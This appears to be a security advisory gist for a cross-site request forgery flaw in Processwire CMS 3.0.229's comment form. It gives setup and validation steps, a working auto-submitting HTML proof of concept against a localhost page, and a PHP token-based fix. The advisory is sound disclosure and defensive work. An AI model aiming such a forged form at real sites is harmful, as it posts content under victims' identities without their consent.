@DefensiumDevelopers
Last active July 21, 2024 07:56
CVE-2024-41597

Cross-site Request Forgery (CSRF) vulnerability in the comments section of Processwire CMS 3.0.229

Description of the vulnerability

Vulnerability Type              : Cross-site Request Forgery (CSRF)

Vulnerable Software Version     : Processwire CMS 3.0.229

Tested on                       : Windows 10, WAMP server 3.3.5

Vulnerability location          : http://localhost/earth/  (here "earth" is the page with comments enabled)


Vulnerability Details:

Cross-Site Request Forgery (CSRF) is a security vulnerability in which an attacker causes the browser of an authenticated user to submit a request to the web application the user is currently authenticated against, exploiting the trust the web application places in that user's session.

Impact of the Vulnerability

Using this vulnerability, an attacker can induce a user to post comments on any page that supports comments. The attacker could thereby trick the user into posting malicious content as comments, which can damage the credibility of that user.

CSRF can also damage the reputation of the website and its administrators. This vulnerability can additionally lead to resource abuse, since comment submissions can trigger resource-intensive operations.

Validation Steps

  1. Either create an article with comments enabled, or visit an existing article that has comments enabled.

    To add the comments feature to your page if it is absent, do the following:

  • Install the Comments fieldtype (FieldtypeComments) from the Admin > Modules menu.

  • Now go to Admin > Setup > Fields and create a new field. Select "Comments" as the fieldtype and give it a name of your choice, for example "comments".

  • Next, you will see several options to configure; select them as appropriate.

  • Now, in the PHP template file for your newly created page, add the following lines of code.

    Enter this where you want the comments to appear:

    <?php echo $page->comments->render(); ?>

    Enter this where you want the comment entry form to appear:

    <?php echo $page->comments->renderForm(); ?>

    The comments feature is now added to your page.

  2. Now turn on your Burp proxy and submit a comment on the page.

  3. Capture the request, remove the Referer header from it, and then generate a CSRF PoC from the captured POST request.

An example PoC is given below. Here the page that was created with comments enabled is at the /earth endpoint.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/earth/" method="POST">
      <input type="hidden" name="cite" value="csrfbug" />
      <input type="hidden" name="email" value="testemail&#64;add&#46;com" />
      <input type="hidden" name="website" value="http&#58;&#47;&#47;aa&#46;com" />
      <input type="hidden" name="text" value="bug" />
      <input type="hidden" name="CommentForm&#95;submit" value="1" />
      <input type="hidden" name="page&#95;id" value="1026" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

  4. Save this code snippet as an HTML file and open it.

Now a new comment has been posted on the page. An image showing this is attached below.

[Image: CSRF_pic-poc, screenshot of the comment posted by the PoC]

Thus an attacker can trick the user into commenting on pages with comments enabled by exploiting this vulnerability.

Recommended Fix

Unpredictable CSRF tokens with significant entropy, included in the relevant requests and validated server-side before the request is processed, prevent this CSRF vulnerability.
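The following is an added example of the synchronizer-token pattern recommended above, written in plain PHP so it runs stand-alone; it is not Processwire's own code. The function names (csrfToken, csrfInput, csrfIsValid), the form field name csrf_token and the session key are assumptions chosen for the example, and the two request arrays at the bottom are constructed test data mirroring the PoC fields.

```php
<?php
// Added example (not Processwire's code): synchronizer-token protection for a
// comment form. Names below (csrfToken, csrfInput, csrfIsValid, csrf_token,
// comment_csrf_token) are assumptions made for this example.

declare(strict_types=1);

const CSRF_SESSION_KEY = 'comment_csrf_token'; // assumed session key name

/**
 * Return the per-session token, creating it on first use.
 * 32 bytes from the CSPRNG (256 bits) give the token the entropy the
 * advisory asks for; hex encoding keeps it safe inside an HTML attribute.
 */
function csrfToken(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

/** Hidden input to place inside the comment form, next to the other fields. */
function csrfInput(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

/**
 * Validate a submitted form against the session token. A missing, empty or
 * non-string value fails closed; hash_equals() compares in constant time so
 * the comparison does not leak the token byte by byte.
 */
function csrfIsValid(array $session, array $post): bool
{
    $expected = $session[CSRF_SESSION_KEY] ?? null;
    $given    = $post['csrf_token'] ?? null;
    if (!is_string($expected) || $expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given);
}

// ---- stand-alone demonstration with a constructed session (php csrf_example.php) ----
$session = [];                       // stands in for $_SESSION in a real template
echo csrfInput($session), PHP_EOL;   // the hidden field the legitimate form would carry

// A submission from the site's own form includes the token...
$legit = ['text' => 'hello', 'csrf_token' => $session[CSRF_SESSION_KEY]];

// ...while a cross-site form like the PoC above cannot read the victim's
// session token and therefore omits it (constructed from the PoC's fields).
$forged = [
    'cite'               => 'csrfbug',
    'email'              => 'testemail@add.com',
    'website'            => 'http://aa.com',
    'text'               => 'bug',
    'CommentForm_submit' => '1',
    'page_id'            => '1026',
];

echo 'legitimate submission: ', csrfIsValid($session, $legit)  ? 'accepted' : 'rejected', PHP_EOL;
echo 'cross-site submission: ', csrfIsValid($session, $forged) ? 'accepted' : 'rejected', PHP_EOL;
```

In a Processwire template the same pattern is available through the framework's own helper, `$session->CSRF->renderInput()` for the hidden field and `$session->CSRF->validate()` for the check (assumption: the stock comment form processes the POST when `renderForm()` is called, so the check has to run before that call, not after it). The token must be tied to the session that renders the form and compared on every state-changing request; checking the Referer header alone is not a substitute, since the validation steps above show the request being captured and replayed without it.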

@xubom123

Rsp

@xubom123

Sol

@xubom123

Gtl

@xubom123

Phn
